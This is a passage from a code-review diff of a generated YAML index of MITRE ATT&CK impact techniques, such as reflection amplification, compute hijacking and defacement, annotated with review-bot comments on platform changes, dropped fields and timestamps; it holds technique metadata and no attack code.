+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
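Review bot: this hunk drops Azure AD, Office 365, SaaS and Google Workspace from T1499.004's `x_mitre_platforms` (the replacement list of Windows, IaaS, Linux, macOS appears in the next hunk), which is a semantic narrowing rather than a reorder; anything derived from this platform list should be regenerated in the same change and the narrowing called out in the commit message. Separately, the retained `identifier: T1489` context line sits in an object that otherwise matches the regenerated ones, which end with only `atomic_tests: []`; that inconsistency predates this change but is worth a follow-up.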
@@ -57904,13 +58661,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57918,36 +58682,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57956,11 +58711,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -57969,17 +58730,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
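Review bot: the `x_mitre_permissions_required` list (User, Administrator, root, SYSTEM) removed from T1565.003 in this hunk has no replacement anywhere in the regenerated object, so any consumer of this index that filters on that field will see different results; please state the field removal in the commit message rather than leaving it buried in the reorder. The `FireEye APT38 Oct 2018` URL change to the mandiant.com PDF repeats here for T1565.003, matching the T1565.001 change above.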
@@ -57988,6 +58763,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -58003,17 +58779,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
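Review bot: the same platform narrowing applied to T1499.004 shows up here for T1498.002 (Azure AD, Office 365, SaaS and Google Workspace removed, version `'1.3'` to `'1.4'`), and because this object keeps its key order the hunk shows the change in its readable form; the removed `x_mitre_modified_by_ref` is re-added at the end of the object in a later hunk, so that line is a move, not a deletion.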
@@ -58023,14 +58794,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -58039,28 +58811,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
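Review bot: the reference block added in this hunk carries upstream misspellings that the regeneration copies verbatim: `Marek Majkowsk` in the re-added `Cloudflare ReflectionDoS May 2017` entry (the `Cloudflare Memcrashed Feb 2018` entry below it spells the same author `Majkowski`), and `amplificaiton` in the unchanged NTP entry at the top of the hunk. Since the file is generated, these should be corrected in the ATT&CK source, not here; the rest of the hunk only reorders references.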
@@ -58071,7 +58843,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -58082,17 +58853,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -58129,7 +58895,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -58150,7 +58917,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
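Review bot: T1491's `modified` moves backwards here (`'2022-05-11T14:00:00.188Z'` to `'2022-03-25T19:34:42.056Z'`) while the object keeps the old key order (`external_references` before `modified`, `name` after it), unlike the regenerated objects elsewhere in this patch that place `modified` and `name` first. That suggests T1491 was not rebuilt from the same bundle as the others; please check how this object was produced.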
@@ -58177,12 +58944,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
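Review bot: the new T1496.002 (Bandwidth Hijacking) object lists six data sources but ships `x_mitre_detection: ''`, and its external_references include `Unit 42 Leaked Environment Variables 2024` and `GoBotKR` while the only citation visible in the description tail here is `(Citation: Sysdig Proxyjacking)`; check that the full description above the hunk actually cites both, otherwise the generator is carrying dangling references through. The `modified` bump on T1657 in the same hunk is accounted for by the contributor and platform edits in the hunks that follow.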
@@ -58215,7 +59048,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -58225,10 +59058,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
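Review bot: the platform edit on T1657 replaces both `Office 365` and `Google Workspace` with the single value `Office Suite`; anything downstream that filters this index on the old platform strings (per-platform index CSVs, coverage matrices) will silently stop matching Financial Theft after this change, so the corresponding filters need the new name in the same PR. The `x_mitre_version: '1.1'` to `'1.2'` bump is consistent with a platform-only revision.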
@@ -58291,7 +59123,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
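Review bot: `spec_version: '2.1'` is dropped from this object and from every other technique object in the diff while `x_mitre_attack_spec_version: 3.2.0` is kept; `spec_version` is a required property on STIX 2.1 objects, so any consumer that validates these `technique` maps as STIX SDOs will reject them after this change. Acceptable if the index is only read by Atomic Red Team tooling, but the removal should be stated in the commit message as intentional rather than left looking like a side effect of regenerating from a different bundle.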
@@ -58332,7 +59163,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
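Review bot: the `modified` timestamp on T1491.001 moves backwards, from `2022-11-08T14:00:00.188Z` to `2022-07-28T18:55:35.988Z`, with no other change to the object and `x_mitre_attack_spec_version: 2.1.0` unchanged; consumers that use `modified` to decide whether to refresh an entry will treat this object as stale. Confirm this mirrors the timestamp in the upstream STIX object rather than the generator having picked up an older copy.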
@@ -58353,9 +59184,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
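Review bot: the two new objects T1496.004 (Cloud Service Hijacking) and T1496.001 (Compute Hijacking) are inserted without the `identifier:` key that sibling entries such as T1491.001 (`identifier: T1491.001` directly before `atomic_tests: []`) and T1531 carry; if the generator emits `identifier` only for techniques that have atomic tests this is fine, otherwise add it for both. Two details worth a look: the T1496.001 description is the old T1496 text verbatim, now under the sub-technique, and the T1496.004 description ends with a trailing space inside the quoted scalar (`impact availability. "`), which is harmless in YAML but will surface in any exact-match comparison against upstream.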
@@ -58408,11 +59387,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -58435,6 +59413,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
